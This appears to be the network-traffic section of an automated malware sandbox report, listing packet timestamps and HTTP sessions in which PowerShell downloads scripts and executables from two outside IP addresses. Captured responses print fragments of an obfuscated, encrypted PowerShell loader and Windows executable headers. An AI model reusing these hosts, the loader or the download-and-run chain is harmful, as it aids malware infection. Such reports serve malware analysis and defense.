                                                                        Jan 2, 2025 19:14:16.638566971 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.638572931 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.638587952 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.638622999 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.638736010 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.683084011 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.683132887 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.683146954 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.683154106 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.683160067 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.683161020 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.683173895 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.683182001 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.683192968 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.683240891 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.683240891 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.733617067 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733623981 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733630896 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733680964 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.733711958 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733715057 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733720064 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733722925 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733728886 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733755112 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733761072 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733772039 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.733772993 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733779907 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733797073 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.733820915 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.733820915 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.733824968 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733833075 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733839989 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733844995 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733851910 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733866930 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.733900070 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.733938932 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733946085 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733958006 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733963013 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733969927 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733975887 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733987093 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733993053 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.733999014 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734004974 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734025002 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734025002 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734041929 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734076023 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734081984 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734093904 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734100103 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734106064 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734118938 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734124899 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734128952 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734131098 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734147072 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734152079 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734158993 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734159946 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734165907 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734179020 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734194994 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734205008 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734214067 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734229088 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734235048 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734245062 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734261036 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734313965 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734469891 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734477043 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734483004 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734488964 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734494925 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734500885 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734507084 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734512091 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734518051 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734523058 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734529018 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734529972 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734570026 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734570980 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734922886 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734929085 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734941959 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734955072 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734961033 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734966040 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734972000 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734977007 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734982014 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.734982967 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.734988928 CET8049721147.45.44.131192.168.2.5
                                                                        Jan 2, 2025 19:14:16.735008001 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.735021114 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.735101938 CET4972180192.168.2.5147.45.44.131
                                                                        Jan 2, 2025 19:14:16.931148052 CET4972180192.168.2.5147.45.44.131
                                                                        • 185.149.146.164
                                                                        • 147.45.44.131
                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        0192.168.2.549714185.149.146.164802180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Jan 2, 2025 19:14:08.382884979 CET169OUTGET /wrcaf.ps1 HTTP/1.1
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: 185.149.146.164
                                                                        Connection: Keep-Alive
                                                                        Jan 2, 2025 19:14:09.008609056 CET1236INHTTP/1.1 200 OK
                                                                        Server: nginx/1.22.1
                                                                        Date: Thu, 02 Jan 2025 18:14:08 GMT
                                                                        Content-Type: application/octet-stream
                                                                        Content-Length: 2469
                                                                        Last-Modified: Thu, 02 Jan 2025 11:48:34 GMT
                                                                        Connection: keep-alive
                                                                        ETag: "67767d12-9a5"
                                                                        Content-Disposition: attachment; filename=wrcaf.ps1
                                                                        Accept-Ranges: bytes
                                                                        Data Raw: 0d 0a 24 4a 33 56 70 6b 20 3d 20 27 49 69 30 52 54 62 47 7a 7a 55 45 76 79 4e 6f 34 42 76 33 2b 35 36 35 61 73 6e 75 65 37 51 64 63 66 45 43 55 55 4c 57 63 35 76 30 3d 27 0d 0a 24 66 54 4d 68 47 20 3d 20 27 54 49 6a 59 2b 6d 43 6f 79 71 72 2f 55 69 36 39 42 36 72 32 36 67 3d 3d 27 0d 0a 24 37 35 57 54 52 20 3d 20 27 70 6a 4b 70 6c 6e 62 32 6f 6c 4f 79 57 52 6d 46 66 2b 51 2f 73 50 50 79 43 33 6c 45 4f 4c 49 47 4f 66 31 42 48 63 4e 67 4c 71 47 68 31 4b 6a 6d 47 48 32 57 67 65 36 62 66 46 6f 63 30 32 2f 74 68 58 6b 38 41 4f 47 52 75 41 33 37 2f 4d 71 5a 67 55 4d 65 35 4f 33 51 66 52 67 61 66 32 55 2f 37 37 71 5a 76 78 36 78 7a 59 6a 56 77 70 71 6d 5a 43 55 62 63 49 72 64 49 50 68 41 39 55 50 2f 76 41 50 31 34 49 71 58 2f 58 51 4b 42 66 45 46 73 73 30 33 38 56 74 30 35 6f 6b 36 75 67 43 65 6e 6b 6f 61 32 78 44 51 45 70 52 41 38 63 6e 31 53 4a 64 35 77 56 2b 45 4b 58 31 57 52 51 6a 38 73 58 5a 31 6a 55 72 79 52 79 6d 58 74 53 54 46 6b 34 6a 4f 6a 6e 71 32 6c 66 63 41 63 6e 38 62 69 2b 59 53 71 2f 38 70 [TRUNCATED]
                                                                        Data Ascii: $J3Vpk = 'Ii0RTbGzzUEvyNo4Bv3+565asnue7QdcfECUULWc5v0='$fTMhG = 'TIjY+mCoyqr/Ui69B6r26g=='$75WTR = 'pjKplnb2olOyWRmFf+Q/sPPyC3lEOLIGOf1BHcNgLqGh1KjmGH2Wge6bfFoc02/thXk8AOGRuA37/MqZgUMe5O3QfRgaf2U/77qZvx6xzYjVwpqmZCUbcIrdIPhA9UP/vAP14IqX/XQKBfEFss038Vt05ok6ugCenkoa2xDQEpRA8cn1SJd5wV+EKX1WRQj8sXZ1jUryRymXtSTFk4jOjnq2lfcAcn8bi+YSq/8pqoRffq/XsRnuV9B9PzWjDLSiQQjuwzo+3VwJdE1qVUYhusxNiAuHSneiZ9Qmsl0joeQIw/vrkdmjNcH54fjjPrfEwG3JiA03BAzamigEVrnU9pst+KyLeDc231Xu4q/Y9y5E5MmkvD5tCp2BKBNSxOItN1zTCA2W1lRg2XNwQ6uUaNOmohob1dq91GZSxFCketl12td+wnQF12OFdrXQ4cK4fx9g2lMztjfCCf+8fD1W0NMeRMhyhL58hKSJXz1taKeYBsn8bGneBJxZOR49IRKdW6O0xNkJT2mQu0Q/byaorbHcL6HxWbRQuJGLKzrsQs0DT+K4e4W+YESktGZvW0q9SHTkltRzKp5PToI0/vvF5X1joTw2/ihGk5/UvsEXWhLU1m2WFFVLbNQhYlTw7+waFp+AwJyQGy19uiJS6fri/7KxOUTYO3Ex+JwnNnCmj52KMsBUI66WtUUFDC95y2wRT2nZyalRrvmrNhiJ/4OUitkrtb4pXhk0FZGboYDqfXuSdswRWNk1uTffhidMJUlHxsuUmzmjhchbaxxbUEJju362F7HJYTIalr2OnpzVBiqvw/rtftZ5Hau
                                                                        Jan 2, 2025 19:14:09.008678913 CET1236INData Raw: 31 42 4f 79 6b 30 6a 6e 75 4a 36 34 68 63 38 67 57 46 51 4e 4d 6c 6c 70 64 52 6c 59 48 45 43 41 74 58 64 58 48 77 2f 67 73 6e 57 79 55 67 47 32 66 4a 50 55 38 4f 4e 50 4c 73 4d 51 64 43 6a 38 41 6a 7a 67 58 51 4f 54 2f 70 36 44 6a 2b 30 71 6a 69
                                                                        Data Ascii: 1BOyk0jnuJ64hc8gWFQNMllpdRlYHECAtXdXHw/gsnWyUgG2fJPU8ONPLsMQdCj8AjzgXQOT/p6Dj+0qjiTamTvyVuzBCRo7JHuXhE4Etppj3olyZm5P9I5tUwOq/XZdrWK1O32gG3SX1Kd8iqSI6Uq+a6S3OUV3aHu4B2Il0Yfjquw0QWhvUi8i55meoaiDwARyszw/tB5Dl4B6TWRczh0/FsU9H2KTyI7Cck2ekyGDrxBdEsk
                                                                        Jan 2, 2025 19:14:09.008691072 CET304INData Raw: 65 63 75 72 69 74 79 2e 43 72 79 70 74 6f 67 72 61 70 68 79 2e 43 72 79 70 74 6f 53 74 72 65 61 6d 4d 6f 64 65 5d 3a 3a 52 65 61 64 29 0d 0a 20 20 20 20 24 76 79 6d 54 61 20 3d 20 4e 65 77 2d 4f 62 6a 65 63 74 20 53 79 73 74 65 6d 2e 49 4f 2e 53
                                                                        Data Ascii: ecurity.Cryptography.CryptoStreamMode]::Read) $vymTa = New-Object System.IO.StreamReader($lGR9E) $p6NOz = $vymTa.ReadToEnd() $vymTa.Close() $lGR9E.Close() $39DGA.Close() return $p6NOz}$IVyDo = XeZIT -OSgCW $


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        1192.168.2.549716147.45.44.131802180C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Jan 2, 2025 19:14:09.233508110 CET275OUTGET /infopage/file.exe HTTP/1.1
                                                                        X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: 147.45.44.131
                                                                        Connection: Keep-Alive
                                                                        Jan 2, 2025 19:14:09.861555099 CET1236INHTTP/1.1 200 OK
                                                                        Date: Thu, 02 Jan 2025 18:14:09 GMT
                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                        Last-Modified: Thu, 02 Jan 2025 11:05:36 GMT
                                                                        ETag: "325e0-62ab7244bf291"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 206304
                                                                        Keep-Alive: timeout=5, max=100
                                                                        Connection: Keep-Alive
                                                                        Content-Type: application/x-msdos-program
                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ae 14 73 f9 ea 75 1d aa ea 75 1d aa ea 75 1d aa fe 1e 1e ab e2 75 1d aa fe 1e 1c ab fd 75 1d aa ea 75 1c aa ae 77 1d aa fe 1e 18 ab c4 75 1d aa fe 1e 19 ab a5 75 1d aa fe 1e e2 aa eb 75 1d aa fe 1e 1f ab eb 75 1d aa 52 69 63 68 ea 75 1d aa 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 e2 9e e4 2e 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 14 00 16 02 00 00 f2 00 00 00 00 00 00 a0 f0 01 00 00 10 00 00 00 30 02 00 00 00 40 00 00 10 00 00 00 02 00 00 0a 00 00 00 0a 00 00 00 05 00 01 00 00 00 00 00 00 30 03 00 00 04 00 00 26 47 03 00 02 00 40 c1 00 00 20 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 [TRUNCATED]
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$suuuuuuwuuuuRichuPEL.0@0&G@ tH`!*TH@@l.textT `.datat0@.idata,@"@@.rsrc`@@@.reloc*,@B
                                                                        Jan 2, 2025 19:14:09.861597061 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                        Data Ascii: A@@@ApAA`P`pP
                                                                        Jan 2, 2025 19:14:09.861620903 CET1236INData Raw: 00 00 60 92 01 00 00 70 92 01 00 00 b0 92 01 00 00 e0 92 01 00 00 50 93 01 00 00 70 93 01 00 00 80 93 01 00 00 20 95 01 00 00 50 95 01 00 00 80 95 01 00 00 b0 95 01 00 00 c0 95 01 00 00 d0 95 01 00 00 10 96 01 00 00 d0 b3 01 00 00 00 b4 01 00 00
                                                                        Data Ascii: `pPp P 0 `p `P` 0@
                                                                        Jan 2, 2025 19:14:09.861639023 CET1236INData Raw: 00 90 fb 01 00 00 00 fe 01 00 00 e0 13 02 00 00 00 14 02 00 00 00 00 00 d4 47 02 00 00 00 00 00 00 00 00 00 00 00 00 00 5f 5f 54 45 53 54 43 4f 44 45 5f 5f 00 00 00 00 82 4f 45 64 27 f8 ce 11 90 59 08 00 36 f1 25 02 ba e5 37 fc 8e 4a ce 11 87 0b
                                                                        Data Ascii: G__TESTCODE__OEd'Y6%7J6#@@@`@@x@A@`@P@`@AAAAAAA@AAA A0A@APA`ApA@A
                                                                        Jan 2, 2025 19:14:09.861649990 CET1236INData Raw: 6c 00 20 00 41 00 6e 00 74 00 6f 00 6e 00 69 00 6f 00 00 00 43 00 6f 00 43 00 72 00 65 00 61 00 74 00 65 00 49 00 6e 00 73 00 74 00 61 00 6e 00 63 00 65 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 00 20 00 75 00 73 00 69 00 6e 00 67 00 20 00 74 00
                                                                        Data Ascii: l AntonioCoCreateInstance failed using the CLSID for '%s'The command line (%s) does not contain a valid persistent OL
                                                                        Jan 2, 2025 19:14:09.861660957 CET1236INData Raw: 79 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 6f 00 72 00 20 00 66 00 61 00 69 00 6c 00 65 00 64 00 2e 00 00 00 43 00 53 00 65 00 63 00 75 00 72 00 69 00 74 00 79 00 44 00 65 00 73 00 63 00 72 00 69 00 70 00 74 00 6f 00 72 00 3a 00 3a 00
                                                                        Data Ascii: yDescriptor failed.CSecurityDescriptor::Initialize failed.SystempsdSelfRelative malloc failed.Cannot AccessAccess
                                                                        Jan 2, 2025 19:14:09.861677885 CET1236INData Raw: 49 00 6e 00 74 00 65 00 72 00 61 00 63 00 74 00 69 00 76 00 65 00 20 00 55 00 73 00 65 00 72 00 00 00 00 00 52 00 75 00 6e 00 41 00 73 00 00 00 00 00 00 00 4e 00 00 00 fd ff 00 00 70 00 00 00 70 00 00 00 26 00 00 00 d0 ce 40 00 4e 00 00 00 fc ff
                                                                        Data Ascii: Interactive UserRunAsNpp&@Npp&@@'@t@A@`@P@`@AAAAAAA@AAA A0A@APA`ApA A0A@APA`A
                                                                        Jan 2, 2025 19:14:09.861689091 CET1236INData Raw: d0 de 41 00 e0 de 41 00 10 da 40 00 f0 de 41 00 00 df 41 00 10 df 41 00 20 df 41 00 30 df 41 00 40 df 41 00 50 df 41 00 60 df 41 00 70 df 41 00 20 e1 41 00 a0 e5 41 00 40 e1 41 00 70 e1 40 00 40 e5 41 00 70 e1 41 00 00 e5 41 00 a0 e1 41 00 b0 e1
                                                                        Data Ascii: AA@AAA A0A@APA`ApA AA@Ap@@ApAAAAAAAA@@@AA A0A@A A`ApAAA@A`ApAPA`ApAAAAPA0@AA@AAAAAARegist
                                                                        Jan 2, 2025 19:14:09.861702919 CET1236INData Raw: a0 e6 41 00 b0 e6 41 00 c0 e6 41 00 d0 e6 41 00 e0 e6 41 00 44 00 45 00 46 00 41 00 55 00 4c 00 54 00 41 00 43 00 43 00 45 00 53 00 53 00 50 00 45 00 52 00 4d 00 49 00 53 00 53 00 49 00 4f 00 4e 00 00 00 53 00 4f 00 46 00 54 00 57 00 41 00 52 00
                                                                        Data Ascii: AAAAADEFAULTACCESSPERMISSIONSOFTWARE\MICROSOFT\OLEGlobal AccessAll classesDefaultAccessPermission2@@@
                                                                        Jan 2, 2025 19:14:09.861715078 CET1236INData Raw: 70 df 41 00 20 e1 41 00 30 e1 41 00 40 e1 41 00 50 e1 41 00 60 e1 41 00 70 e1 41 00 80 e1 41 00 a0 e1 41 00 e0 e8 41 00 c0 e1 41 00 d0 e8 41 00 e0 e1 41 00 f0 e1 41 00 60 b4 40 00 10 c6 40 00 80 c6 40 00 b0 e8 41 00 10 e2 41 00 20 e2 41 00 30 e2
                                                                        Data Ascii: pA A0A@APA`ApAAAAAAAA`@@@AA A0A@APA`ApAAAAAp@System ConfigurationFF8@@@
                                                                        Jan 2, 2025 19:14:09.866547108 CET1236INData Raw: 65 00 6c 00 00 00 00 00 44 00 6c 00 6c 00 53 00 75 00 72 00 72 00 6f 00 67 00 61 00 74 00 65 00 00 00 00 00 4c 00 6f 00 63 00 61 00 6c 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 00 00 00 00 53 00 65 00 72 00 76 00 69 00 63 00 65 00 50 00 61 00
                                                                        Data Ascii: elDllSurrogateLocalServiceServiceParametersInProcHandler32TreatAsAppIDMSJAVA.DLLBOTHFREEAPARTMENTNEUTRAL
                                                                        Jan 2, 2025 19:14:10.556200027 CET255OUTGET /infopage/iviewers.dll HTTP/1.1
                                                                        X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: 147.45.44.131
                                                                        Jan 2, 2025 19:14:10.738917112 CET1236INHTTP/1.1 200 OK
                                                                        Date: Thu, 02 Jan 2025 18:14:10 GMT
                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                        Last-Modified: Thu, 02 Jan 2025 11:05:39 GMT
                                                                        ETag: "16000-62ab724726645"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 90112
                                                                        Content-Type: application/x-msdos-program
                                                                        Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 7f 78 25 53 3b 19 4b 00 3b 19 4b 00 3b 19 4b 00 70 61 48 01 31 19 4b 00 70 61 4e 01 a8 19 4b 00 70 61 4f 01 2f 19 4b 00 3d 98 4e 01 24 19 4b 00 3d 98 4f 01 2a 19 4b 00 3d 98 48 01 2f 19 4b 00 70 61 4a 01 38 19 4b 00 3b 19 4a 00 6e 19 4b 00 56 98 42 01 3a 19 4b 00 56 98 4b 01 3a 19 4b 00 56 98 b4 00 3a 19 4b 00 56 98 49 01 3a 19 4b 00 52 69 63 68 3b 19 4b 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 95 72 76 67 00 00 00 00 00 00 00 00 e0 00 02 21 0b 01 0e 26 00 de 00 00 00 88 00 00 00 00 00 00 63 13 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 00 00 00 00 00 00 00 a0 [TRUNCATED]
                                                                        Data Ascii: MZ@!L!This program cannot be run in DOS mode.$x%S;K;K;KpaH1KpaNKpaO/K=N$K=O*K=H/KpaJ8K;JnKVB:KVK:KV:KVI:KRich;KPELrvg!&c@JT$K(,>p=@ .text `.rdataab@@.data<`D@.rsrcN@@.reloc,P@B


                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                        2192.168.2.549721147.45.44.131802276C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                        TimestampBytes transferredDirectionData
                                                                        Jan 2, 2025 19:14:12.491224051 CET275OUTGET /infopage/iubn.ps1 HTTP/1.1
                                                                        X-Special-Header: qInx8F3tuJDHXgOEfPJjbaipYaSE1mobJ2YRyo2rjNgnVDhJvevN8R2ku8oPCBonhmpzFb2GYqPiLhJq
                                                                        User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                                                        Host: 147.45.44.131
                                                                        Connection: Keep-Alive
                                                                        Jan 2, 2025 19:14:13.091254950 CET1236INHTTP/1.1 200 OK
                                                                        Date: Thu, 02 Jan 2025 18:14:13 GMT
                                                                        Server: Apache/2.4.52 (Ubuntu)
                                                                        Last-Modified: Thu, 02 Jan 2025 11:02:00 GMT
                                                                        ETag: "692-62ab7176e913d"
                                                                        Accept-Ranges: bytes
                                                                        Content-Length: 1682
                                                                        Keep-Alive: timeout=5, max=100
                                                                        Connection: Keep-Alive
                                                                        Data Raw: 0d 0a 24 78 6e 68 43 58 44 20 3d 20 27 37 49 5a 77 45 41 74 6f 6a 32 79 42 37 6e 71 55 4f 44 63 34 63 73 68 37 6c 54 36 32 71 2b 78 74 7a 49 56 61 75 30 35 70 57 75 67 3d 27 0d 0a 24 73 51 55 56 70 68 20 3d 20 27 69 46 41 69 38 65 6a 46 66 4b 70 67 44 51 38 59 39 59 63 31 6b 67 3d 3d 27 0d 0a 24 78 42 41 4f 4a 36 20 3d 20 27 42 59 59 76 48 54 65 50 7a 37 6a 4b 67 64 4c 5a 5a 69 4a 59 64 42 6a 4d 44 65 70 35 59 48 4a 68 4b 69 31 5a 63 44 36 57 52 48 37 4d 43 43 41 30 76 36 61 38 53 61 6d 4a 62 64 39 39 38 36 77 6b 47 37 57 44 46 5a 31 4c 7a 31 68 2b 6a 4e 66 4e 62 32 4f 63 43 73 50 78 37 61 33 6d 69 4a 50 4a 6e 61 6a 48 43 6c 32 50 72 66 76 68 56 35 2b 67 32 79 6e 4d 2f 4e 33 2b 62 42 6e 75 67 5a 74 51 57 71 54 39 69 47 4b 45 45 79 42 59 46 52 48 76 4d 4e 75 45 65 49 53 73 73 4b 39 50 35 50 75 54 71 58 6e 47 53 4a 41 59 35 53 4b 74 75 42 72 33 62 49 47 72 58 67 76 62 44 36 34 33 38 47 2f 52 69 4c 76 41 56 62 74 75 62 42 67 2b 41 6a 55 6a 50 50 71 52 6f 68 65 71 64 33 52 57 64 41 64 30 46 75 77 36 74 [TRUNCATED]
